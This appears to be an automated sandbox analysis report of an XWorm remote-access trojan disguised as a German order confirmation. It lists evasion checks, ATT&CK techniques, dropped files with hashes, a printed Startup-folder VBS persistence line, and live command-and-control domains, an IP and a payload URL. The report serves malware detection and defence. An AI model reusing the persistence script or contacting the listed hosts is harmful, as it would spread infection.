Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Bestellbest#U00e4tigung.exe PID: 5732, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Memory allocated: CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Memory allocated: 2B10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Memory allocated: 10D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Memory allocated: E10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Memory allocated: 29F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Memory allocated: 2870000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: Bestellbest#U00e4tigung.exe, 00000000.00000002.2287041471.0000000000DBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll^

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, NativeMethods.cs	Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
Source: 0.2.Bestellbest#U00e4tigung.exe.6560000.10.raw.unpack, ResourceReferenceValue.cs	Reference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
Source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, Messages.cs	Reference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

Process created: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe "C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Queries volume information: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Queries volume information: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 3.2.Bestellbest#U00e4tigung.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2288152388.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bestellbest#U00e4tigung.exe PID: 5732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Bestellbest#U00e4tigung.exe PID: 5532, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 3.2.Bestellbest#U00e4tigung.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Bestellbest#U00e4tigung.exe.2c5cf54.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3377109892.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2288152388.0000000002F3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bestellbest#U00e4tigung.exe PID: 5732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Bestellbest#U00e4tigung.exe PID: 5532, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	211 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Data Obfuscation	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	21 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Bestellbest#U00e4tigung.exe	24%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Current.exe	24%	ReversingLabs

Source	Detection	Scanner	Label
officialtrmmy.ydns.eu	0%	Avira URL Cloud	safe
http://win32.ydns.eu/never/lookinto/it/panel/uploads/Rieukcp.pdf	0%	Avira URL Cloud	safe
sdremm.ydns.eu	0%	Avira URL Cloud	safe
bich23.ydns.eu	0%	Avira URL Cloud	safe
http://win32.ydns.eu	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
win32.ydns.eu	45.144.214.104	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://win32.ydns.eu/never/lookinto/it/panel/uploads/Rieukcp.pdf	true	Avira URL Cloud: safe	unknown
officialtrmmy.ydns.eu	true	Avira URL Cloud: safe	unknown
bich23.ydns.eu	true	Avira URL Cloud: safe	unknown
sdremm.ydns.eu	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-net	Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-neti	Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2288152388.0000000002B49000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Bestellbest#U00e4tigung.exe, 00000000.00000002.2288152388.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	Bestellbest#U00e4tigung.exe, 00000000.00000002.2308491727.0000000006510000.00000004.08000000.00040000.00000000.sdmp, Bestellbest#U00e4tigung.exe, 00000000.00000002.2297247713.0000000003E13000.00000004.00000800.00020000.00000000.sdmp	false		high
http://win32.ydns.eu	Bestellbest#U00e4tigung.exe, 00000000.00000002.2288152388.0000000002B11000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.144.214.104	win32.ydns.eu	Ukraine		47169	HPC-MVM-ASHU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1628932
Start date and time:	2025-03-04 09:34:27 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Bestellbest#U00e4tigung.exe renamed because original name is a hash value
Original Sample Name:	Bestellbesttigung.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@4/3@1/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 94% Number of executed functions: 93 Number of non-executed functions: 16
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.60, 172.202.163.200
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Bestellbest#U00e4tigung.exe, PID 5532 because it is empty
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
09:35:37	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.144.214.104	FFDOC-2025210 pdf.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Ptcugze.mp3
	UPS tracking details.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Fjuzaw.pdf
	Enquiry#039855.exe	Get hash	malicious	XWorm	Browse	win32.ydns.eu/never/lookinto/it/panel/uploads/Tnemxaef.vdf

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
win32.ydns.eu	FFDOC-2025210 pdf.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	UPS tracking details.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	45.144.214.104
	Enquiry#039855.exe	Get hash	malicious	XWorm	Browse	45.144.214.104

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HPC-MVM-ASHU	FFDOC-2025210 pdf.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	nklarm.elf	Get hash	malicious	Unknown	Browse	45.131.150.251
	UPS tracking details.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	45.144.214.104
	1ZXaFij.exe	Get hash	malicious	Xmrig	Browse	45.144.212.77
	Enquiry#039855.exe	Get hash	malicious	XWorm	Browse	45.144.214.104
	Auftragsbest#U00e4tigung.exe	Get hash	malicious	Quasar	Browse	45.144.214.107
	IRSTaxRefund.exe	Get hash	malicious	DBatLoader, Remcos	Browse	45.144.214.126
	SCS AWB and Commercial Invoice.exe	Get hash	malicious	Snake Keylogger, XWorm	Browse	45.144.214.104
	PaRWfF3x5K.elf	Get hash	malicious	Unknown	Browse	45.131.150.253
	6uBxa0vGQt.elf	Get hash	malicious	Gafgyt	Browse	213.181.218.192

Process:	C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	181248
Entropy (8bit):	6.053955552690453
Encrypted:	false
SSDEEP:	3072:klgBT3Bx3/AOxGQH0BivJ7JD4GwxHmdId/Dis+mWMKWPPyLAkkLR:kaBT3fIOz0BivJ72GwtmdId/RWey0xL
MD5:	9BE63A33CE71DBAB9292A999480253FB
SHA1:	CDE46A95A7AEED46D9ECB3315E71BCFE2D82036E
SHA-256:	FAE38184C5FFE7BC017485D6CD3340FEB5AC7E67960E7E9599FA1901367DFCE6
SHA-512:	F86A9160159779E92F2922CAED2BF5758B9121E8024E1BAAE19B26FC5885C6826FC5F4CDFBB5529305FCB26F684B2FDA38AE1FCA81C58E780DC97422184047C0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................... ............`.................................\|...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H...........0..........L...h............................................0..........(+.....0../.........(....}.......}......\|......(...+..\|....(......0...........(....o.......(.....0...........{......&..,8.(....o.......(....-?..%.}......}.....\|.......(...+.....{......\|............%.}......(....(....(....(....(.... .w..(....(.... .w..(....(......&........}.....\|.....(.........}.....\|....(................................6.\|.....(.......0..7.........(....}.......}.......}

C:\Users\user\AppData\Roaming\Current.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs

Download File

Process:	C:\Users\user\Desktop\Bestellbest#U00e4tigung.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.6045439450635675
Encrypted:	false
SSDEEP:	3:FER/n0eFHHoN+EaKC5+kAHn:FER/lFHIN7aZ5+JH
MD5:	4C66C33C31121583A32B982DA1B98D05
SHA1:	6DB377A76FEB3B337ECFA7A87A0EF69EA594F6D9
SHA-256:	220E57B5588829807CE965A19B528C63847B5E71A2DC76C09D512A59457D5D84
SHA-512:	57CCF1E3A8744D294BAEF6FA28CAF49111339C9CF3900C08098656263FFE1A139BC2CC92D1D78AE4019D0D16C045C0B7079C722086197514238AD839214C0E84
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Current.exe"""

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.053955552690453
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Bestellbest#U00e4tigung.exe
File size:	181'248 bytes
MD5:	9be63a33ce71dbab9292a999480253fb
SHA1:	cde46a95a7aeed46d9ecb3315e71bcfe2d82036e
SHA256:	fae38184c5ffe7bc017485d6cd3340feb5ac7e67960e7e9599fa1901367dfce6
SHA512:	f86a9160159779e92f2922caed2bf5758b9121e8024e1baae19b26fc5885c6826fc5f4cdfbb5529305fcb26f684b2fda38ae1fca81c58e780dc97422184047c0
SSDEEP:	3072:klgBT3Bx3/AOxGQH0BivJ7JD4GwxHmdId/Dis+mWMKWPPyLAkkLR:kaBT3fIOz0BivJ72GwtmdId/RWey0xL
TLSH:	63041818E258CB2BD3DF1774D5A40405CBF9C616E297EF8A6C58A4F9B843301B94F27A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................... ............`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x42d9ce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67C69A05 [Tue Mar 4 06:13:25 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2d97c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2e000	0x600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x30000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
